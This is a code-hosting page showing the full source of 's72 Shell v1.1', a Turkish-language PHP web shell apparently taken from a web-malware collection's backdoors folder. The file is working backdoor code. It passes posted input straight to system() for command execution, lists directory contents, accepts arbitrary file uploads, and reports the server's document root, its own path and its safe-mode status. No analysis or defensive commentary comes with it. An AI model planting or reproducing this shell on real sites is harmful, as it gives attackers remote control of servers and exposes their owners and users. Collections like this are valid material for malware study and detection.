PageRenderTime 30ms CodeModel.GetById 7ms RepoModel.GetById 0ms app.codeStats 0ms

/Backdoors/PHP/s72 Shell v1.1 Coding.php

http://web-malware-collection.googlecode.com/
PHP | 141 lines | 127 code | 13 blank | 1 comment | 11 complexity | 7a06a25e30b350d6de4bded87d716710 MD5 | raw file
  1. <html>
  2. <head>
  3. <meta http-equiv="Content-Language" content="tr">
  4. <meta name="GENERATOR" content="Microsoft FrontPage 5.0">
  5. <meta name="ProgId" content="FrontPage.Editor.Document">
  6. <meta http-equiv="Content-Type" content="text/html; charset=windows-1254">
  7. <title>s72 Shell v1.0 Codinf by Cr@zy_King</title>
  8. <meta name="Microsoft Theme" content="refined 011">
  9. </head>
  10. <body background="refbgd2.gif" bgcolor="#000000" text="#FFFFFF" link="#666699" vlink="#999999" alink="#999900">
  11. <!--mstheme--><font face="Times New Roman">
  12. <p><font face="Comic Sans MS" color="#FF0000"><b>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </b>s72 Shell v1.1 Coding by <a href="mailto:crazy_king@turkusev.net">
  13. <font color="#00FF00">Cr@zy_King&nbsp; </font>
  14. </a> </font></p>
  15. <p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
  16. <font color="#FF0000"><b><font face="Comic Sans MS" size="1">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; [
  17. Server Bilgileri ]</td>
  18. </tr>
  19. <tr>
  20. <td width="49%" height="142">
  21. </font></b></font>
  22. </p>
  23. <p align="center">
  24. <font color="#800080"><b><font face="Verdana" style="font-size: 8pt">
  25. Dizin</font></b></font><font face="Verdana" style="font-size: 8pt"><font color="#800080"><b>:</b> <? echo $_SERVER['DOCUMENT_ROOT']; ?>
  26. <br />
  27. <b>Shell Dizini:</b> <? echo $SCRIPT_FILENAME ?>
  28. <br>
  29. &nbsp;</font></font><p align="center"><form method="post">
  30. <p align="center">
  31. <font color="#800080">
  32. <br>
  33. </font><font face="Verdana" style="font-size: 8pt" color="#800080">Buraya
  34. Kodunuzu Yazýn :)</font><font color="#111111"><br>
  35. <br>
  36. </font>
  37. <font color="#FF0000">
  38. <textarea size="70" name="command" rows="2" cols="43" ></textarea> <br>
  39. <br><input type="submit" value="Çalý?týr!"></font><font color="#FF0000"><br>
  40. &nbsp;<br></font></p>
  41. </form>
  42. <p align="center">
  43. <font color="#FF0000">
  44. <textarea readonly size="1" rows="7" cols="53"><?php @$output = system($_POST['command']); ?></textarea></font><p align="center">
  45. &nbsp;<p align="center">
  46. <font color="#FF0000">
  47. <td width="49%" height="24" bgcolor="#FCFEBA">
  48. </font>
  49. <p align="center"><font color="#FF0000"><b>
  50. <font face="Comic Sans MS" size="1">[ Diziler -_- Dizinler ]</td>
  51. <td width="51%" height="24" bgcolor="#FCFEBA">
  52. </font></b></font>
  53. <form method="post">
  54. <p align="center">
  55. <font face="Verdana" style="font-size: 11pt">
  56. <?
  57. $folder=opendir('./');
  58. while ($file = readdir($folder)) {
  59. if($file != "." && $file != "..")
  60. echo '<a target="_blank" href="'.$file.'">'.$file.'</a ><br>';
  61. }
  62. closedir($folder);
  63. ?></p>
  64. </form>
  65. <p align="center">
  66. <br>
  67. <b><font face="Comic Sans MS" size="1" color="#FF0000">[ Upload ]</font></b></font><font face="Comic Sans MS" size="1"><b><font color="#FF0000"></td></font></b></font><form enctype="multipart/form-data" method="post">
  68. <p align="center"><br>
  69. <br>
  70. <font face="Verdana" style="font-size: 8pt" color="#800080">Buradan Dosya Upload Edebilirsiniz.</font><br>
  71. <br>
  72. <input type="file" name="file" size="20"><br>
  73. <br>
  74. <font style="font-size: 5pt">&nbsp;</font><br>
  75. <input type="submit" value="Yükle!"> <br>
  76. &nbsp;</p>
  77. </form>
  78. <?php
  79. function check_file()
  80. {
  81. global $file_name, $filename;
  82. $backupstring = "copy_of_";
  83. $filename = $backupstring."$filename";
  84. if( file_exists($filename))
  85. {
  86. check_file();
  87. }
  88. }
  89. if(!empty($file))
  90. {
  91. $filename = $file_name;
  92. if( file_exists($file_name))
  93. {
  94. check_file();
  95. echo "<p align=center>Dosya Zaten Bulunuyor</p>";
  96. }
  97. else
  98. {
  99. copy($file,"$filename");
  100. if( file_exists($filename))
  101. {
  102. echo "<p align=center>Dosya Ba?arýlý Bir ?ekilde Yüklendi</p>";
  103. }
  104. elseif(! file_exists($filename))
  105. {
  106. echo "<p align=center>Dosya Bulunamadý</p>";
  107. }
  108. }
  109. }
  110. ?>
  111. <font face="Verdana" style="font-size: 8pt">
  112. <p align=\"center\"></font>
  113. </td>
  114. <font color="#111111">
  115. <br>
  116. <br>
  117. <br /><br /> </font>
  118. <?php
  119. // Check for Safe Mode
  120. if( ini_get('safe_mode') ) {
  121. print '<font color=#FF0000><b>Güvenlik Açýk</b></font>';
  122. } else {
  123. print '<font color=#008000><b>Güvenlik Kapalý</b></font>';
  124. }
  125. ?>
  126. <!--mstheme--></font>
  127. </body>
  128. </html>